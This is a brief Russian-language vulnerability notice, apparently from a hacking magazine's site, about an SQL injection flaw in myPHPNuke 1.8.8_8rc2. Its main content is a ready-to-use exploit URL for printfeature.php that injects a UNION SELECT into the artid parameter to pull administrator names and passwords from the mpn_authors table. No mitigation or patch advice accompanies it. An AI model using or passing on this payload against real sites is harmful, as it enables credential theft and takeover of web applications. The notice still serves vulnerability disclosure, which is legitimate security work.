Рекомендуем почитать:
Хакер #305. Многошаговые SQL-инъекции
Программа: myPHPNuke 1.8.8_8rc2
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL
команды в базе данных приложения.
Эксплоит:
http://site/printfeature.php?artid=-1%20union%20select%20null,null,aid,
pwd,null,null,null,null%20from%20mpn_authors%20limit%200,1